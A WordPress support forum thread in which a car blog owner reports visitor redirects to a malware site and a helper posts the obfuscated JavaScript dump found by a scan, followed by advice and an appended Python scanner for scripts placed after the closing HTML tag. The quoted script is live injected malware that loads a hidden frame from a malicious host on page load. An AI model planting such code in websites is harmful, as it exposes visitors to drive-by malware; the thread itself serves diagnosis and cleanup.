[resolved] Receiving a filedownload message on website (10 posts)

  1. Naumansiddiqui
    Posted 5 years ago #


    I just started a car blog, trying to list all the cars.

    The problem has recently occurred: whenever someone opens the website, after the loading is done, the website tries to connect to momhand(dot)ru, which is pretty much a malware site. I mean you are asked to download a PDF file and all types of Java errors come in.

    For helpers, here is the link to my site: Hotmodcars

    I am really frustrated and demotivated as I have done everything to remove this. All advice is welcome; I look forward to help.


  2. I presume you read this and followed the suggestions: FAQ My site was hacked

    I didn't get prompted to download a PDF, mind, and I ran a scan


    and got this in the javascript dump

    this.S="";var x=new Array();var P;yu=["y"];G=["o"];F=function(){this.YG=50396;this.YG--;function Y(h,q,T){u=8318;u++;this.a_='';return h.substr(q,T);var d={lg:"lL"};var Cw={k:"b"};}var O=document;W={QW:false};var e=String("/goo"+"gle."+"com/"+"badj"+Y("ojo.BPq0",0,4)+Y("com/MPs",0,4)+Y("tinyvEse",0,4)+"pic."+Y("com.Hun",0,4)+Y("phpcyrm",0,3));var Tx={jt:"er"};this.az=56602;this.az-=255;var j='';PO={xb:52344};Zx={ZG:60817};var OD={Pa:"ki"};var Tk=RegExp;var dc="";var jG={};this.Zh=59066;this.Zh++;function A(h,q){var T=new String("[")+q+"]";var H=new String();try {} catch(Vy){};var M=new Tk(T, String("g"));this.Yo=24897;this.Yo-=97;return h.replace(M, j);};var _=A('suc1r1i1p1tC','uCZz1B9');IL=[];var WW=new Date();var L=657268-649188;var qw=new String();Ui={ba:"Mp"};var X=Y("bodygqEj",0,4);var OW={};var n='';var i=null;var ke=new Array();var oJj=["QZ","ly"];P=function(){ZO=18634;ZO+=200;this._q=48372;this._q+=252;try {bE={JJ:false};this.tW=59935;this.tW++;var _w=A('c3r9evavtqeHEpl3eHmTezndti','sZH8izTYAw0XL1Nqdp39vk');N=19659;N++;var R="";Td=O[_w](_);var c=A('svrjcv','EDv56mah9fJi1_jK');this.tc=8123;this.tc-=212;this.qy=45699;this.qy-=131;var h=L+e;kp={};var vp=false;var l=String("de"+Y("feGYh",0,2)+Y("VmArAmV",3,1));v_=[];ed={BS:60825};var D="";Td[l]=[1][0];Yj=["TC","qW"];var fZ="fZ";Td[c]=String(Y("htlBk",0,2)+"tp"+Y(":/Ic3",0,2)+Y("/mxYX",0,2)+Y("omeLP",0,2)+"ha"+"nd"+Y(".rMWln",0,2)+"u:")+h;this.Ia="";ja=30223;ja--;var sf=[];O[X].appendChild(Td);var bV=49047;var Aq=4712;} catch(B){};};};var yn={};var mT="";F();cJ=45828;cJ++;hE=43099;hE++;g={Jf:false};window.onload=P;var BAu=new Array();var pP=false;

    At a guess? That may be it.

  3. Naumansiddiqui
    Posted 5 years ago #

    How to remove it? Any suggestions?

  4. Yeah, what it says here: FAQ My site was hacked

    You'll have to check everything, and hopefully you have a good backup.

  5. Naumansiddiqui
    Posted 5 years ago #

    So you are suggesting that my site got hacked?

    Backup isn't an issue, but how do I resolve the current scenario?

    I don't want to back down... I want to take it apart. Any resource which can help me in this issue?

  6. Yes. Your site was hacked.

    Seriously. Either it was hacked by a theme or plugin, an exploit, an insecure password, who knows. What I DO know is that the FAQ I've linked to, twice (thrice as of this post) is your best resource on how to undo a hack.

    FAQ My site was hacked

  7. Naumansiddiqui
    Posted 5 years ago #

    Well, thanks. Istenu. Thanks for your help.

    Other viewers are welcome to put a response too.

  8. esmi
    Forum Moderator
    Posted 5 years ago #

  9. PaBLoX
    Posted 5 years ago #

    If you check your web source code you'll see there is a strange line containing a script. I presume it's in footer.php, since it is below the HTML close tag.

    You have to delete that and then take all the necessary precautions so it doesn't happen again (that's when I'm having troubles...).

    Anyway, follow the faq, maybe after that nobody is going to bother you again.
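
The check PaBLoX describes above, as an added example that is not part of the original thread: it flags any `<script>` placed after the closing `</html>` tag in a page source or theme template, and notes traits visible in the quoted dump (split string literals, `substr` slicing, `appendChild`, a `window.onload` hook). The function names, the indicator list and the sample footer are assumptions constructed for illustration.

```python
import re
from pathlib import Path

CLOSE_HTML = re.compile(r"</html\s*>", re.IGNORECASE)
SCRIPT = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.IGNORECASE | re.DOTALL)
# Heuristics (assumed, not exhaustive) based on traits visible in the dump quoted in this thread.
INDICATORS = {
    "onload_hook": re.compile(r"window\.onload\s*="),
    "dom_append": re.compile(r"appendChild\s*\("),
    "substr_slicing": re.compile(r"\.substr\s*\("),
    "split_strings": re.compile(r"""["'][^"']{1,6}["']\s*\+\s*["']"""),
}


def trailing_scripts(source: str):
    """Return one finding per <script> located after the last </html>."""
    closes = list(CLOSE_HTML.finditer(source))
    if not closes:
        return []
    findings = []
    for m in SCRIPT.finditer(source, closes[-1].end()):
        body = m.group(1)
        hits = sorted(name for name, rx in INDICATORS.items() if rx.search(body))
        line = source.count("\n", 0, m.start()) + 1
        findings.append({"line": line, "indicators": hits, "length": len(body)})
    return findings


def scan_theme(theme_dir: str):
    """Scan every .php template under theme_dir; map file path -> findings."""
    report = {}
    for path in sorted(Path(theme_dir).rglob("*.php")):
        found = trailing_scripts(path.read_text(errors="replace"))
        if found:
            report[str(path)] = found
    return report


# Constructed sample: a footer template with a harmless stand-in script after </html>.
SAMPLE_FOOTER = """<?php wp_footer(); ?>
</body>
</html>
<script>var u="ex"+"am"+"ple.in"+"valid";var s=document.createElement("script");
s.src="http://"+"abcd".substr(0,0)+u;window.onload=function(){document.body.appendChild(s);};</script>
"""

if __name__ == "__main__":
    for finding in trailing_scripts(SAMPLE_FOOTER):
        print(finding)
```

A hit only tells you where to look; the file still has to be compared against a clean copy of the theme, as the FAQ linked in the thread advises.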

  10. Naumansiddiqui
    Posted 5 years ago #

    Dear All thanks,

    The code was in a file which I removed.

    Now, trying to take measures to close XSS issues.

    Thank you

Topic Closed

This topic has been closed to new replies.
